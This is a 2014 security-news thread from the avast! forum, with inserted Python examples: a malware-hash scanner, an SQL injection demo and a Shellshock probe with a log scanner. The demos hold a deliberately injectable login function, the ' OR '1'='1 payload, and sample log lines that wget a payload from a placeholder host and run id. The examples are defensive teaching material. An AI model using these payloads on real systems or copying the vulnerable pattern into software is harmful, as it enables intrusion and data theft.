http://www.bishopfox.com/news/2014/07/business-insider/
http://www.bishopfox.com/news/2014/07/daily-dot-incredibly-easy-hijack-google-chromecast/
-
Mashable – Chromecast Hack Lets You Rickroll Your Neighbor’s TV
http://www.bishopfox.com/news/2014/07/mashable-chromecast-hack-lets-rickroll-neighbors-tv/
http://www.bishopfox.com/news/2014/07/business-insider/
http://www.bishopfox.com/news/2014/07/daily-dot-incredibly-easy-hijack-google-chromecast/
Not quite that easy unless your WiFi is unprotected.
If that's the case, you probably deserve to have your Chromecast hijacked.
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
-
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Bob, this might work in the USA, but certainly not in Europe. ;)
-
Russia Offers 4 Million Rubles to Crack the Tor Network
http://globalvoicesonline.org/2014/07/24/russia-tor-privacy-nsa/
http://www.theregister.co.uk/2014/07/25/putin_crack_tor_for_me_and_ill_make_you_a_millionaire/
http://rt.com/politics/russia-tor-anonymizer-ban-571/
-
The Web never forgets: Persistent tracking mechanisms in the wild
https://securehomes.esat.kuleuven.be/~gacar/persistent/index.html
-
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Thankfully most countries are civilised enough so people don't need to arm themselves to feel safe. ;)
-
Google AdSense click fraud by Russian GoodGoogle competition, read:
http://krebsonsecurity.com/2014/07/service-drains-competitors-online-ad-budget/
link article author = Brian Krebs
polonus
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Works here as well!
-
How Much Can We Trust PUA Installers?
http://www.opswat.com/blog/how-much-can-we-trust-pua-installers
-
Easily monitor and secure your computer with GEARS
http://www.opswatgears.com/download
-
Securing your browser: Internet Explorer
http://blogs.norman.com/2014/for-consumption/securing-your-browser-internet-explorer
Why should I sign-out of my accounts?
http://blogs.norman.com/2014/for-consumption/why-should-i-sign-out-of-my-accounts
-
Tor security advisory: "relay early" traffic confirmation attack
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack
-
Average Internet of Things device has 25 security flaws
http://www.telegraph.co.uk/technology/internet-security/11000013/Average-Internet-of-Things-device-has-25-security-flaws.html
-
MDN Database Disclosure
https://blog.mozilla.org/security/2014/08/01/mdn-database-disclosure/
-
Poweliks: the persistent malware without a file
https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html
http://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html
Office documents using CVE-2012-0158:
74e0d21fe9edf7baf489e29697fff8bc4a6af811e6fe3027842fe96f6a00a2d9
88bc64e5717a856b01a04684c7e69114d309d52a885de9fc759e5a99ac20afd5
https://www.virustotal.com/nb/file/74e0d21fe9edf7baf489e29697fff8bc4a6af811e6fe3027842fe96f6a00a2d9/analysis/
https://www.virustotal.com/nb/file/88bc64e5717a856b01a04684c7e69114d309d52a885de9fc759e5a99ac20afd5/analysis/
The Poweliks installer (creates the registry keys):
4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa
https://www.virustotal.com/nb/file/4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb/analysis/
https://www.virustotal.com/nb/file/e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa/analysis/
-
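The Poweliks post above lists SHA-256 hashes for the lure documents and the installer. The following is an added example (not posted by anyone in the thread and not part of any product mentioned) of the sweep a responder would run with those indicators: walk a directory tree, hash every file in chunks so large files do not have to fit in memory, and report anything whose digest is on the list. The `demo()` self-test uses invented file contents whose hash is added to the indicator set; no real sample is needed.

```python
import hashlib
import os
import tempfile

# SHA-256 values as listed in the thread for the Poweliks lure documents
# (CVE-2012-0158 Office files) and the registry-creating installer.
POWELIKS_SHA256 = {
    "74e0d21fe9edf7baf489e29697fff8bc4a6af811e6fe3027842fe96f6a00a2d9",
    "88bc64e5717a856b01a04684c7e69114d309d52a885de9fc759e5a99ac20afd5",
    "4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb",
    "e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa",
}


def sha256_file(path, chunk=1 << 20):
    """Hash a file in 1 MiB chunks so large files are never fully read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root, iocs):
    """Walk root and return {path: sha256} for every file whose digest is in iocs."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable or vanished file: skip rather than abort the sweep
            if digest in iocs:
                hits[path] = digest
    return hits


def demo():
    """Constructed self-test: one 'known bad' sample and one benign file in a temp dir.

    The sample bytes are invented; their hash is added to the indicator set so
    the match path is exercised without the real malware being present.
    """
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "invoice.doc")
        good = os.path.join(tmp, "readme.txt")
        with open(bad, "wb") as f:
            f.write(b"CONSTRUCTED-SAMPLE-NOT-REAL-MALWARE")
        with open(good, "wb") as f:
            f.write(b"nothing to see here")
        iocs = POWELIKS_SHA256 | {sha256_file(bad)}
        hits = scan_tree(tmp, iocs)
        return {os.path.basename(p): d for p, d in hits.items()}


if __name__ == "__main__":
    for name, digest in demo().items():
        print(f"MATCH {name} {digest}")
```

Hash matching only catches the exact files listed; a repacked installer gets a new digest, so pair it with the registry checks described in the linked write-ups rather than relying on it alone.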
Cybercrime attacks points-of-sale via standard passwords: https://www.us-cert.gov/ncas/alerts/TA14-212A
polonus
-
Re-posted here https://forum.avast.com/index.php?topic=153117.msg1113063#msg1113063
I gave credit to polonus. 8)
-
@Para-Noid,
Thanks, my good friend, for spreading the heads-up on this.
And on the Cyber Crime tracker site keep an eye out for a cyber-crime bot like Alina and friends.
No Alina is not some friendly lady, read here: https://forum.avast.com/index.php?topic=149713.0
Search Alina's family here: http://cybercrime-tracker.net/index.php?s=0&m=40&search=Alina
pol
-
Re-posted here https://forum.avast.com/index.php?topic=153117.msg1113063#msg1113063
I gave credit to polonus. 8)
I don't understand ??? Did Polonus discover this attack ??? :)
-
Polonus posted the link to the news (threat detected by the Department of Homeland Security),
but where the Alina point-of-sale bot is concerned I was the first one out here on the forums to claim attention to it.
Mind you that in a lot of large department stores Win-XP still is the underlying software at the counter
(quite a cyber crime risk to say the least).
I think Para-Noid just wanted to be friendly and we both pass the credits for the link
and the detection of the threat to the US Department of Homeland Security Officials.
Credits will go where credits are due.
polonus
-
Malware downloads used to identify Tor-users: http://www.wired.com/2014/08/operation_torpedo/
pol
-
Russian Gang Amasses Over a Billion Internet Passwords
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?hp&action=click&pgtype=Homepage&version=LedeSum&module=first-column-region%C2%AEion=top-news&WT.nav=top-news&_r=0
-
FireEye and FoxIT have snaffled the decode keys for 500,000 victims of crypto ransomware
Decrypt site : https://www.decryptcryptolocker.com/
Blurb : http://betanews.com/2014/08/06/get-out-of-jail-free-card-for-cryptolocker-victims/
-
Russian Gang Amasses Over a Billion Internet Passwords
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?hp&action=click&pgtype=Homepage&version=LedeSum&module=first-column-region%C2%AEion=top-news&WT.nav=top-news&_r=0
More from CNN here http://money.cnn.com/2014/08/05/technology/security/russian-hackers-theft/index.html?hpt=hp_t1
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
-
Don't just trust any link on your smartphone: http://securelist.com/blog/virus-watch/65459/android-worm-on-chinese-valentines-day/
link article author = Securelist's Vigi Zhang.
polonus
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
Since Hold Security isn't identifying the exploited sites so we know where it's now safe to change a password (non-disclosure is such a convenient CYA mechanism), might we rely on AOS to check for "SQL injection flaws" before it puts that green check mark next to a site name?
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
Since Hold Security isn't identifying the exploited sites so we know where it's now safe to change a password (non-disclosure is such a convenient CYA mechanism), might we rely on AOS to check for "SQL injection flaws" before it puts that green check mark next to a site name?
Since SQL injection is outside of what AOS is actually monitoring, it isn't checking page content (script injection, etc.) as such, then No it won't. Adding 420,000 + sites to a list (like the known malicious sites) for checking is likely to impact on browsing.
The web shield is more likely to detect SQL injection as that is looking at source code, etc. Presumably this SQL injection would probably take you to (or run code on) another site. This is the sort of thing that the web shield is looking at.
-
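On the SQL injection point discussed above: an added example, not posted by anyone in the thread and not code from any product mentioned here, of what the "SQL injection flaw" behind such a breach looks like and of the fix. The user table and credentials are constructed for the demonstration; SQLite is used only so the example runs without a server. The vulnerable function is deliberately written the insecure way to show the tautology bypass.

```python
import sqlite3

# Constructed sample accounts for the demonstration (not from any real site).
USERS = [
    ("alice", "s3cret-alice"),
    ("bob", "s3cret-bob"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The injectable pattern: user input spliced into the SQL text.

    Deliberately insecure; a quote in the input ends the string literal and
    the rest of the input becomes SQL syntax.
    """
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both versions with real credentials and with the classic tautology payload."""
    conn = make_db()
    payload = "' OR '1'='1"  # turns the WHERE clause into something always true
    return {
        "vulnerable_good_creds": login_vulnerable(conn, "alice", "s3cret-alice"),
        "vulnerable_injected": login_vulnerable(conn, payload, payload),
        "safe_good_creds": login_safe(conn, "alice", "s3cret-alice"),
        "safe_injected": login_safe(conn, payload, payload),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result!r}")
```

With the payload, the vulnerable query becomes `... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'`, which matches every row, so the attacker is logged in as the first account in the table without knowing any password; the parameterized version looks for a user literally named `' OR '1'='1` and finds none.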
Hi merckxist,
Apart from the SQL threat, considering the overall website security situation of sites on the Interwebs to-day -
it is a good policy to change passwords once in a while over time.
Once bitten twice shy (where I point at what happened to these support forums recently).
Your reaction shows that you are fully aware of the present password security situation.
polonus
P.S.
DavidR and I are using script blocking on sites (e.g. No Script) as a good form of protection against third party threats.
-
Researchers release CryptoLocker decryption tool
https://www.virusbtn.com/blog/2014/08_06.xml
https://forum.avast.com/index.php?topic=153229.0
-
WordPress 3.9.2 Security Release
http://wordpress.org/news/2014/08/wordpress-3-9-2/
-
Google will give a better ranking to https sites over http sites.
This as a security priority. Or is this security through obscurity measure?
So it will be high time av scanners could scan within SSL sites now.
Read on the Google Blog: http://googleonlinesecurity.blogspot.ca/2014/08/https-as-ranking-signal_6.html
polonus
-
IE plays security catch-up, will block outdated Java plug-ins
http://www.computerworld.com/s/article/9250209/IE_plays_security_catch_up_will_block_outdated_Java_plug_ins?taxonomyId=85
-
Windows 8.1 biz users face patch freeze as Microsoft sets critical updates
http://www.computerworld.com/s/article/9250240/Windows_8.1_biz_users_face_patch_freeze_as_Microsoft_sets_critical_updates?taxonomyId=85
-
Cybercrime only costs a fraction of the damage it does.
polonus
-
Microsoft Security Bulletin Advance Notification for August 2014
https://technet.microsoft.com/library/security/ms14-aug
-
Is your neighbor's cat gone a-wardriving, is this a normal flea band or one going to break into your WiFi router?
Read: https://defcon.org/html/defcon-22/dc-22-speakers.html#Bransfield (link article author = Gene Bransfield)
What is out there on the hot tin roof?
pol
-
Does Avast fix or remove Powelik?
-
Does Avast fix or remove Powelik?
Please start your own topic..!!
-
Spy agencies hit in cyber espionage campaign: Kaspersky Lab
http://www.reuters.com/article/2014/08/07/us-cybersecurity-hackers-epicturla-idUSKBN0G71LU20140807
-
Mobile chips face lockdown to prevent hacks
http://www.itworld.com/hardware/431003/mobile-chips-face-lockdown-prevent-hacks
-
Patient malware big threat to VM, only 18% of malware halted by a VM, read: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/threats_to_virtual_environments.pdf
polonus
-
Malicious Tor Browser version launched via fake Tor-website:
http://dustri.org/b/torbundlebrowserorg.html link article author = Julien Voisin.
Infesting users via fake almost identical copies of original websites seems to become a new trend.
polonus
-
Posted here too https://forum.avast.com/index.php?topic=66267.msg1115643#msg1115643
-
Anyway hope those concerned and dependent on tor anonymity saw these latest alerts.
Sorry Asyn for the "doublure". ;D
polonus
-
Gamma FinFisher hacked: 40 GB of internal documents and source code of government malware published
https://netzpolitik.org/2014/gamma-finfisher-hacked-40-gb-of-internal-documents-and-source-code-of-government-malware-published/
-
A new colour for your Facebook profile? It's a scam
http://www.theguardian.com/technology/2014/aug/07/facebook-profile-colour-scam
-
Satellite communications hacked!
http://www.nbcchicago.com/investigations/Security-Expert-Discovers-Hole-In-Satellite-Communications-271779971.html
-
Ebola fear used as bait, leads to malware infection
http://www.deccanchronicle.com/140818/technology-science-and-trends/article/ebola-fear-used-bait-leads-malware-infection
-
U.S. Finds ‘Backoff’ Hacker Tool Is Widespread
http://bits.blogs.nytimes.com/2014/08/22/secret-service-warns-1000-businesses-on-hack-that-affected-target/
-
Lots of US firms infested with POS malware: https://www.us-cert.gov/ncas/alerts/TA14-212A
pol
-
Blocking anonymity software like Tor, Ultrasurf, Hide My Ass, OpenVPN, CoralCDN as a top priority on the work-floor.
Read: http://www.checkpoint.com/documents/ebooks/security-report-2014/files/assets/common/downloads/Check%20Point%20Security%20Report%202014.pdf
pol
-
Sub-domain on SourceForge redirects to Flash Pack Exploit Kit (https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/)
Thanks to an article in : http://billmullins.wordpress.com/2014/08/26/tech-thoughts-daily-net-news-august-26-2014/
-
Secunia Country Reports
The Secunia Country Reports tell you how much vulnerable software is present on private PCs in your country, plus a few extra, interesting facts.
http://secunia.com/resources/countryreports/
Out-of-date/end-of-life third-party software and system non-updates are a known way in for malware infections.
-
14 antivirus apps found to have security problems
http://www.theregister.co.uk/2014/07/29/antivirus_blood_splattered_as_biz_warned_audit_or_die/
pdf.doc here http://mincore.c9x.org/breaking_av_software.pdf
Antivirus products riddled with security flaws, researcher says
http://www.pcworld.com/article/2459760/antivirus-products-riddled-with-security-flaws-researcher-says.html
-
14 antivirus apps found to have security problems
http://www.theregister.co.uk/2014/07/29/antivirus_blood_splattered_as_biz_warned_audit_or_die/
pdf.doc here http://mincore.c9x.org/breaking_av_software.pdf
Not signing product updates and delivering those over insecure HTTP, running excessive old code and not conducting proper source code reviews and fuzzing
Seems avast! is ok.
Besides the tone, which I do not like at all, avast! was one of the most tested antivirus and due to the bug bounty program, we got them fixed.
-
PUAs Open the Door to System Vulnerabilities
http://www.opswat.com/blog/puas-open-the-door-system-vulnerabilities
-
Landfill.bugzilla.org Disclosure
http://bugzillaupdate.wordpress.com/2014/08/27/landfill-bugzilla-org-disclosure/
-
Sadly just added to my newest presentation "Security Is Everyones Business" (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409748047991-5217.png)
-
For the Facebook users, Privacy Checkup is now rolling out. (http://newsroom.fb.com/news/2014/09/privacy-checkup-is-now-rolling-out/)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409921949018-52542.png) (http://newsroom.fb.com/news/2014/09/privacy-checkup-is-now-rolling-out/)
-
In the news – car hacking, plane hacking and exploitable UEFI BIOS
http://blogs.norman.com/2014/business/in-the-news-car-hacking-plane-hacking
-
Hole in popular WordPress-plug-in abused actively: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
pol
-
107.000 websites no longer trusted by Mozilla https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla (article author = Project Sonar's J.Nickel)
Also read: https://kuix.de/blog/ (blog author Karl Engert).
When will this come to Chrome as well. When will we be alerted?
polonus
-
107.000 websites no longer trusted by Mozilla https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla (article author = Project Sonar's J.Nickel)
Also read: https://kuix.de/blog/ (blog author Karl Engert).
When will this come to Chrome as well. When will we be alerted?
polonus
Something you need to ask Google not the avast! forum members.....
-
Hi bob3160,
I hope the avast members will ask Google on our behalf ;D as well as all will benefit.
Damian
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1410277405958-3587.png)
It may not help what's happened but a free one year watch to help prevent Identity theft is available. (https://homedepot.allclearid.com/)
(An excerpt from Security Is Everyones Business (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing) )
-
Watch your browser's address bar to prevent TABjacking
Interesting article
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
and this one includes a test in a "Try it Out" section.
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
(that demo worked on a tablet, but not on PC because of NoScript in the browser)
URL in the address bar will definitely show whether you're really entering your credentials (into, for example, gmail, your bank, here), or not, so never stop watching it as you traverse open tabs.
-
Ask.com: Different Name, Same Old Dirty Tricks (http://www.davescomputertips.com/ask-com-different-name-same-old-dirty-tricks/?utm_source=wysija&utm_medium=email&utm_campaign=Weekly+Recap+Newsletter)
A nice new "useful" tool:
(http://www.davescomputertips.com/wp-content/uploads/2014/08/utility-chest-1.png)
Useless is a better way to describe it but, people will certainly fall for this crap.
-
Useless is a better way to describe it but, people will certainly fall for this crap.
How I hate Ask.com >:(
-
May have been posted before......
Mac security packages range from peachy to rancid – antivirus tests
http://www.theregister.co.uk/2014/09/04/mac_anti_virus_test/
AV-Comparatives Mac test
http://www.av-comparatives.org/mac-security-reviews/
-
May have been posted before......
Mac security packages range from peachy to rancid – antivirus tests
http://www.theregister.co.uk/2014/09/04/mac_anti_virus_test/
AV-Comparatives Mac test
http://www.av-comparatives.org/mac-security-reviews/
https://forum.avast.com/index.php?topic=147567.msg1122271#msg1122271 :)
-
Website Security – Compromised Website Used To Hack Home Router
http://blog.sucuri.net/2014/09/website-security-compromised-website-used-to-hack-home-routers.html
-
Hi Lisandro,
Some do agree with you here in this discussion: https://www.mywot.com/en/forum/9900-ask-com-toolbar-is-adware
Bad ethics, riskware, junkware, adware, trackware and being sneaked in by some big players like Oracle. 8)
polonus
-
Sadly just added to my newest presentation "Security Is Everyones Business" (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409748047991-5217.png)
Ex-Employees Say Home Depot Left Data Vulnerable
http://www.nytimes.com/2014/09/20/business/ex-employees-say-home-depot-left-data-vulnerable.html
-
DuckDuckGo now blocked in China: http://thenextweb.com/asia/2014/09/22/duckduckno/
Re: https://en.greatfire.org/duckduckgo.com
pol
-
Good we can be watched unhindered: https://en.greatfire.org/https/forum.avast.com/index.php%3Ftopic%3D52252.msg1126623
No censorship detected
polonus
-
Large malvertising campaign under way involving DoubleClick and Zedo
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
-
The big apps-developer security fail: http://www.aspectsecurity.com/the-2014-state-of-developer-application-security-knowledge-report-landing-page?&__hssc=&__hstc&hsCtaTracking=83cedd39-6b74-4b5b-a840-bebc18bb4a63%7C8e3027fb-d244-45b5-9c3c-5e5233d7bb1e
pol
-
One issue: Secure Object Implementations
These security expressions should be taught to developers, see:
http://docs.spring.io/spring-security/site/docs/3.0.x/reference/el-access.html
polonus
-
Another data breach at eBay!
http://www.toptechnews.com/article/index.php?story_id=112003I4NJEO
-
Experts warn Bash bug poses “catastrophic” threat to devices in the home
http://www.news.com.au/technology/experts-warn-bash-bug-poses-catastrophic-threat-to-devices-in-the-home/story-e6frfrnr-1227070183296
-
In-App Browsers Considered Harmful
http://furbo.org/2014/09/24/in-app-browsers-considered-harmful/
-
Experts warn Bash bug poses “catastrophic” threat to devices in the home
http://www.news.com.au/technology/experts-warn-bash-bug-poses-catastrophic-threat-to-devices-in-the-home/story-e6frfrnr-1227070183296
Is avast! vulnerable to this attack.
Actually, are we vulnerable to the attack because avast uses the bash shell ?
-
Most draconian anti-terror law to come to Australia: http://www.smh.com.au/digital-life/consumer-security/terror-laws-clear-senate-enabling-entire-australian-web-to-be-monitored-and-whistleblowers-to-be-jailed-20140925-10m8ih.html
polonus
-
Most draconian anti-terror law to come to Australia: http://www.smh.com.au/digital-life/consumer-security/terror-laws-clear-senate-enabling-entire-australian-web-to-be-monitored-and-whistleblowers-to-be-jailed-20140925-10m8ih.html
polonus
Whistle blowers should be rewarded. Not jailed. IMHO :)
-
Patch Bash NOW: 'Shell Shock' bug blasts OS X, Linux systems wide open
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
-
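For the Bash bug posts above, an added example that is neither from the thread nor from avast!: the first function runs the widely published probe for the original Shellshock bug (CVE-2014-6271) against whatever `bash` is on the PATH, and the second scans web server access log lines for the same function-definition pattern arriving in request headers, which is how the bug was exploited against CGI. The log lines are constructed for the demonstration with documentation IP addresses. The probe covers only the first bug, not the follow-up parser bugs that were fixed in later patches, so "patched" here means "not vulnerable to the original test", nothing more.

```python
import os
import re
import shutil
import subprocess

# Payload shape from the CVE-2014-6271 disclosure: a function definition
# followed by a trailing command. An unpatched bash runs the trailing command
# while importing the variable as a function at startup.
PROBE_VALUE = "() { :;}; echo SHELLSHOCK_EXECUTED"


def shellshock_probe(bash_path=None):
    """Start bash with a crafted environment variable and see whether it executes.

    Returns "vulnerable" if the trailing command ran, "patched" if bash only
    treated the variable as plain data, and "no-bash" if no bash binary exists.
    """
    bash = bash_path or shutil.which("bash")
    if not bash or not os.access(bash, os.X_OK):
        return "no-bash"
    env = {"PATH": "/usr/bin:/bin", "x": PROBE_VALUE}
    proc = subprocess.run(
        [bash, "-c", "echo probe"],
        env=env, capture_output=True, text=True, timeout=10,
    )
    return "vulnerable" if "SHELLSHOCK_EXECUTED" in proc.stdout else "patched"


# A function body "() { ... }" followed by ";" and more text is the signature
# of the exploit in User-Agent, Referer, Cookie or similar header values.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed Apache combined-format lines (not from a real server).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.99/x -O /tmp/x'"
198.51.100.7 - - [25/Sep/2014:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:01:04 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { foo;}; echo Content-type: text/plain; echo; /usr/bin/id" "curl/7.37"
"""


def find_shellshock_attempts(log_text):
    """Return the log lines carrying a Shellshock-style payload in any field."""
    return [line for line in log_text.splitlines() if SHELLSHOCK_RE.search(line)]


if __name__ == "__main__":
    print("local bash:", shellshock_probe())
    for line in find_shellshock_attempts(SAMPLE_ACCESS_LOG):
        print("ATTEMPT:", line)
```

The log scan is a cheap way to answer "were we probed?" on an exposed host; whether an attempt succeeded depends on the CGI scripts that were reachable and on the bash version at the time, which the log alone does not tell you.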
The Internet on yellow alert considering the Bash-bug situation: https://isc.sans.edu/diary/Why+We+Have+Moved+to+InfoCon%3AYellow/18715
polonus
-
Perl CORE - Deep Recursion Stack Overflow
https://www.lsexperts.de/security-advisory/items/schwachstelle-perl-core.html
-
Just one by me personally this time. I was startled to find the actual status of insecure web server header policy settings for the majority of websites on the Internet. The majority of website admins and website security staff must have been fast asleep when they were taught these matters in school. Or could it be that this protocol was largely ignored by educators? :o
To get an idea what I mean go here to see this site's epic fail in this respect: https://forum.avast.com/index.php?topic=155715.0
polonus
-
Cyberattack Against JPMorgan Chase Affects 76 Million Households
http://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/
http://www.nytimes.com/interactive/2014/10/03/business/dealbook/jpmorgan-documents.html
-
VMware product updates address critical Bash security vulnerabilities
http://www.vmware.com/security/advisories/VMSA-2014-0010.html
-
Bugzilla Zero-Day Exposes Zero-Day Bugs
http://krebsonsecurity.com/2014/10/bugzilla-zero-day-exposes-zero-day-bugs/
-
Huge Data Leak at Largest U.S. Bond Insurer
http://krebsonsecurity.com/2014/10/huge-data-leak-at-largest-u-s-bond-insurer/
-
Beijing police arrests 30.000 cybercrime suspects: http://www.icrosschina.com/news/2014/1009/4280.shtml
I have not seen SEO SPAM numbers going down because of these efforts ;D
polonus
-
Microsoft Security Bulletin Advance Notification for October 2014
https://technet.microsoft.com/library/security/ms14-oct
-
Google Chrome users under attack from long phishing uri's: http://news.netcraft.com/archives/2014/10/09/phishing-with-data-uris.html
I am protected by the Netcraft extension in Google Chrome.
polonus
-
Dairy Queen - Data Security Incident
http://www.dq.com/us-en/datasecurityincident/
Kmart Investigating Payment System Breach
http://www.kmart.com/en_us/dap/statement1010140.html
-
Ummm...
It seems the https:// has broken. Sunday 12 October 2014 @16:42 WAST. My K-Meleon74 raised the alarm with the red URL bar, but couldn't tell me what was wrong, Opera 12.01 doesn't have the glaring colours, but does have the Security Info pop-down...
See the attachments.
Gordon.
-
AT&T breach exposes Social Security Numbers.
http://www.ibtimes.com/att-breach-exposes-social-security-drivers-license-numbers-1700410
-
DropBox Hacked.
If you're using it, change your password NOW.
-
DropBox Hacked.
If you're using it, change your password NOW.
If you have 2nd factor authentication and use a unique password... Well... I'll pass...
-
Breaking news: SSLv3 protocol holed.
Scary vulnerability to be revealed soon!
News on this is soon to come out, read:
https://twitter.com/briankrebs/status/522127738153750528
Brian Krebs as always, well informed.
More here: http://seclists.org/oss-sec/2014/q4/318
polonus
There was already something found wrong with java's implementation of DHE cipher suites: roughly 0.5% of SSL handshakes for DHE cipher suites fail.
Update - Now we know it is called Poodle, a serious security hole, read: https://www.imperialviolet.org/2014/10/14/poodle.html
D
-
Hi Lisandro,
Well the bottom has fallen out under dropbox :D for quite some users, so I pass, no dropbox for me.
polonus
-
DropBox Hacked.
If you're using it, change your password NOW.
-> https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/
-
DropBox Hacked.
If you're using it, change your password NOW.
-> https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Technically, they are right the passwords were compromised through a third party app.
End result still has the same effect. The advice still stands. Change your password.
For help on doing this, follow these simple instructions:
http://youtu.be/gDCv4xPeoVI
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
We already sold London bridge to the USA - they thought they were buying Tower bridge ;D
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
We already sold London bridge to the USA - they though they were buying Tower bridge ;D
I saw it in Lake Havasu City, AZ. :)
(http://upload.wikimedia.org/wikipedia/commons/thumb/f/f8/London_Bridge%2C_Lake_Havasu_City%2C_Arizona_%283227888290%29.jpg/220px-London_Bridge%2C_Lake_Havasu_City%2C_Arizona_%283227888290%29.jpg)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1413501206054-33072.png)
Gmail does a fairly good job at weeding out Spam and suspicious emails.
Nothing else to add except be careful!
-
DropBox Hacked.
If you're using it, change your password NOW.
Er... Just had a Cap'n Cook at https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/.
Please--and it's not just you Bob--if we're gonna post warnings, can we have some evidence? We all know how frustrating False Alarms are on our AV apps >:(
OTOH, it always pays to have backups of your Cloud Storage, and certainly I only use DropBox for sharing purposes.
Gordon.
-
DropBox Hacked.
If you're using it, change your password NOW.
Er... Just had a Cap'n Cook at https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/.
Please--and it's not just you Bob--if we're gonna post warnings, can we have some evidence? We all know how frustrating False Alarms are on our AV apps >:(
OTOH, it always pays to have backups of your Cloud Storage, and certainly I only use DropBox for sharing purposes.
Gordon.
@Gordon,
Technically speaking, Dropbox's servers did not get breached.
